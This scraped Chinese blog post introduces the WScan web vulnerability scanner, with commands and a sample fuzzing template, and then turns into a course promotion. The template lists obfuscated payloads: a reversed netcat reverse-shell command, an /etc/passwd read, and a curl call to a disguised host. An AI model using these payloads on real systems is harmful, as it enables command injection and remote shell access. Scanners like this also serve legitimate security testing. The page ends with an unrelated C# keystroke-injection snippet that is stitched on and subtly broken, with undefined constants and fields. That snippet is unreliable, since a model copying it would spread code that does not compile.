WScan一款专注于WEB安全的扫描器工具-漏洞扫描

0x01 工具介绍

    Wscan是一款专注于WEB安全的扫描器,它向Nmap致敬,而Nmap已经开源25年了。我们也计划在未来25年内持续更新Wscan,并将其持续开源。我们欢迎所有对web安全感兴趣的人一起加入我们的开发团队。我们的目标是开发一款使用机器学习进行渗透测试的工具。与其他工具不同的是,我们的工具可以自动学习攻击和防御的模式,并根据具体的目标进行个性化的攻击。这样一来,我们的攻击效率和准确性将大大提高,同时也能降低误判的概率。我们的工具采用了机器学习技术,实现了全自动化的Web渗透测试。这意味着无需手动添加和更新规则和签名,它能够自动学习和适应新的攻击模式和漏洞。机器学习技术还能够快速处理大量的数据和流量,从而大幅提高测试效率和准确性。此外,它能够识别和发现一些人工难以察觉的漏洞和弱点,从而改善测试质量和可靠性。我们相信,使用机器学习技术进行渗透测试,将是未来网络安全的一个重要方向。我们希望我们的工具能够帮助更多的人保障网络安全,为网络安全事业做出贡献。

下载地址在末尾

0x02 功能简介

架构简析

开源时间表

    Wscan的目标是创建一个开源且非盈利的项目。然而,由于Wscan的工作量庞大,代码仍在快速迭代中。过早地进行开源可能导致各种各样的魔改版本涌现,这对工具的传播和项目未来的发展并不利。因此,计划以Stars作为考量指标,分阶段分模块进行开源,以确保项目的稳健性和社区的有序参与。
YAML POC扫描模块 (Stars > 400 开源)``反连模块 (Stars > 400 开源)``对内置的Payload不满意,自定义WAF绕过WEB通用漏洞检测模板 (特色功能)(Stars > 400 开源)``SQL注入模块 (Stars > 500 开源)``动态爬虫 (Stars > 600 开源)``目录扫描模块 (Stars > 700 开源)``基线扫描 (Stars > 800 开源)``基于消息订阅的插件调度模块 (Stars > 900 开源)``HTTP参数形变模块, 传统扫描模块全部开源, 可自行修改编译构建扫描器 (Stars > 1k 开源)``机器学习降低误报模块 (Stars > 3k 开源)``机器学习自动生成Paylaod模块 (Stars > 4k 开源)

→点击获取网络安全资料·攻略←

200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

0x03更新介绍

2023.11.05 发布v1.0.0 二进制版,支持简单的Web通用漏洞检测``2023.11.12 发布v1.0.1 二进制版,静态爬虫``2023.11.12 发布v1.0.2 二进制版,支持被动扫描``2023.11.19 发布v1.0.3 二进制版,支持JSONP插件``2023.11.26 发布v1.0.4 二进制版,修复XSS、SQL注入漏报的问题,支持对单个URL进行漏洞检测``2023.11.30 发布v1.0.5 二进制版,支持浏览器爬虫、支持URL、表单智能过滤``2023.12.02 发布v1.0.6 二进制版,支持输出JSON、HTML格式的扫描结果``2023.12.03 发布v1.0.7 二进制版,支持Yaml POC扫描插件``2023.12.04 发布v1.0.8 二进制版,支持通过命令行指定要启用的plugins``2023.12.09 发布v1.0.9 二进制版,支持自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)``2023.12.12 发布v1.0.10 二进制版,目录扫描内置400条常见规则、支持自定义扫描路径爆破。支持ASP、PHP通用命令执行检测``2023.12.24 发布v1.0.11 二进制版,支持独立部署反连模块,同时Yaml POC支持反连功能``2023.12.30 发布v1.0.12 二进制版,支持Goby JSON POC插件,多层URL目录POC扫描``2024.01.07 发布v1.0.13 二进制版,支持XXE、SSRF、Fastjson、 Struts2系列漏洞批量检测

0x04 使用介绍

(1) 主动扫描``./wscan  --log-level=debug ws --basic-crawler http://testphp.vulnweb.com/ --json-output=wscan_scan_result.json --html-output=wscan_scan_result.html``./wscan  --log-level=debug ws --browser  http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html``./wscan  --log-level=debug ws --url http://testphp.vulnweb.com/listproducts.php?cat=1  --json-output=wscan_scan_result.json``./wscan  --log-level=debug ws --url-file=/wscan/url_file.txt --html-output=wscan_scan_result.html``./wscan  --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html``(2) 被动扫描``./wscan  --log-level=debug ws --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json`  `(3) POC扫描`    `3.1 POC下载地址 https://github.com/chushuai/wscan-poc/releases`    `3.2 Wscan首次运行时,将会生成一个名为config.yaml的文件。您需要修改该文件中的以下内容,以指定include_poc的路径。`        `prometheus:`            `enabled: true`            `depth: 1`            `auto_load_poc: false`            `include_poc:`                `- C:\wscan_windows_amd64.exe\wscan-poc-1.0.0\pocs\*.yml`            `exclude_poc: []``    3.3 通过命令行启用--plug=prometheus,并且指定--url-file(一行一个url)绝对路径,即可进行大范围POC检测`        `./wscan --log-level=debug ws --plug=prometheus  --url-file=/url_file.txt  --html-output=wscan_scan_result.html``(4) 自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)`    `4.1 不同于POC测试,自定义WEB通用漏洞扫描插件,会对指定位置的参数进行FUZZ,`        `样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/custom_tmpl/tmpl/owasp`        `插件样例`        `---`        `payload:`          `- $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)`          `- /etc/passwd`          ``- "`curl -L http://\u24BC\u24C4\u24C4\u24BC\u24C1\u24BA.\u24B8\u24C4\u24C2`"``        `encoder:`          `- URL`        `placeholder:`          `- URLParam`          `- HTMLForm`          `- HTMLMultipartForm`          `- JSONRequest`        `type: "RCE"`        `...`    `4.2 您需要修改config.yaml文件中的以下内容,以指定include_tmpl的路径。`        `enabled: true`        `depth: 0`        `auto_load_tmpl: false``        include_tmpl:`          `- /wscan/core/plugins/custom_tmpl/tmpl/owasp/*.yml`        `exclude_tmpl: [ ]`        `block_status_codes: # 被WAF阻止时HTTP状态码列表,默认值为403`          `- 403`        `pass_status_codes: # 未被WAF阻止时HTTP状态码列表, 默认值为200或404`          `- 200`          `- 404`        `block_regex: "" # 被WAF阻止网页的正则表达式`        `pass_regex: "" # 未被WAF阻止网页的正则表达式`        `non_blocked_as_passed: false`    `4.3 通过命令行启用--plug=custom_tmpl,即可对目标网站进行自定义Payload测试。`        `./wscan --log-level=debug ws --plug=custom_tmpl  --browser  http://testphp.vulnweb.com/  --html-output=wscan_scan_result.html``(5) 独立部署反连模块``./wscan  reverse

生成报告模板

题外话

初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:

  • 2023届全国高校毕业生预计达到1158万人,就业形势严峻;

  • 国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。

6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中,本科计算机类专业起薪与2021届基本持平,高职自动化类月收入增长明显,2022届反超铁道运输类专业(5295元)排在第一位。

具体看专业,2022届本科月收入较高的专业是信息安全(7579元)。对比2018届,电子科学与技术、自动化等与人工智能相关的本科专业表现不俗,较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼,已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
在这里插入图片描述

“没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!

2、人才缺口大,就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W,现在从事网络安全行业的从业人员只有10W人。

行业发展空间大,岗位非常多

网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性,尤其是掌握工作中的核心网络架构、安全技术,在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升,所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟,升值空间一路看涨,这也是为什么受大家欢迎的主要原因。

从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

  • 34
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
要实现将扫描到窗体组件中的条码发送到另一个测试软件条码框中,可以通过以下步骤实现: 1. 在C#中,使用Barcode Scanner控件来扫描条码。在扫描完成后,可以通过Barcode Scanner控件的事件来获取扫描结果。 2. 获取扫描结果后,可以使用Windows API来模拟键盘输入。具体来说,可以使用SendInput函数来发送模拟键盘输入消息。 3. 找到测试软件的条码框句柄,使用Windows API来将模拟键盘输入消息发送到测试软件的条码框中。可以使用FindWindow函数和SendMessage函数来实现这一步。 以下是一个示例代码: ```csharp [DllImport("user32.dll")] public static extern bool SendMessage(IntPtr hWnd, int Msg, int wParam, int lParam); [DllImport("user32.dll")] public static extern IntPtr FindWindow(string lpClassName, string lpWindowName); [DllImport("user32.dll")] public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, uint dwExtraInfo); [DllImport("user32.dll")] static extern uint MapVirtualKey(uint uCode, uint uMapType); [DllImport("user32.dll", SetLastError = true)] static extern uint SendInput(uint nInputs, [MarshalAs(UnmanagedType.LPArray), In] INPUT[] pInputs, int cbSize); private const int WM_SETTEXT = 0x000C; private const int KEY_UP = 0x0002; private const int KEY_DOWN = 0x0000; private const int VK_RETURN = 0x0D; public void SendBarcodeToTestSoftware(string barcode) { // 模拟按下并释放回车键 keybd_event(VK_RETURN, (byte)MapVirtualKey(VK_RETURN, 0), KEY_DOWN, 0); keybd_event(VK_RETURN, (byte)MapVirtualKey(VK_RETURN, 0), KEY_UP, 0); // 获取测试软件条码框句柄 IntPtr hwnd = FindWindow(null, "测试软件窗口标题"); if (hwnd == IntPtr.Zero) { MessageBox.Show("未找到测试软件窗口"); return; } // 将焦点设置到测试软件条码框 SendMessage(hwnd, WM_SETFOCUS, 0, 0); // 将扫描到的条码发送到测试软件条码框中 foreach (char c in barcode) { INPUT[] inputs = new INPUT[2]; inputs[0] = new INPUT(); inputs[0].type = 1; inputs[0].ki.wVk = 0; inputs[0].ki.wScan = (ushort)c; inputs[0].ki.dwFlags = KEYEVENTF.UNICODE; inputs[0].ki.time = 0; inputs[0].ki.dwExtraInfo = IntPtr.Zero; inputs[1] = new INPUT(); inputs[1].type = 1; inputs[1].ki.wVk = 0; inputs[1].ki.wScan = (ushort)c; inputs[1].ki.dwFlags = KEYEVENTF.KEYUP | KEYEVENTF.UNICODE; inputs[1].ki.time = 0; inputs[1].ki.dwExtraInfo = IntPtr.Zero; SendInput(2, inputs, Marshal.SizeOf(typeof(INPUT))); } } // 定义INPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct INPUT { public uint type; public InputUnion U; public static int Size { get { return Marshal.SizeOf(typeof(INPUT)); } } } // 定义InputUnion结构体 [StructLayout(LayoutKind.Explicit)] public struct InputUnion { [FieldOffset(0)] public MOUSEINPUT mi; [FieldOffset(0)] public KEYBDINPUT ki; [FieldOffset(0)] public HARDWAREINPUT hi; } // 定义MOUSEINPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct MOUSEINPUT { public int dx; public int dy; public uint mouseData; public uint dwFlags; public uint time; public IntPtr dwExtraInfo; } // 定义KEYBDINPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct KEYBDINPUT { public ushort wVk; public ushort wScan; public uint dwFlags; public uint time; public IntPtr dwExtraInfo; } // 定义HARDWAREINPUT结构体 [StructLayout(LayoutKind.Sequential)] public struct HARDWAREINPUT { public uint uMsg; public ushort wParamL; public ushort wParamH; } ``` 请注意,此示例仅供参考,具体实现可能需要根据实际情况进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值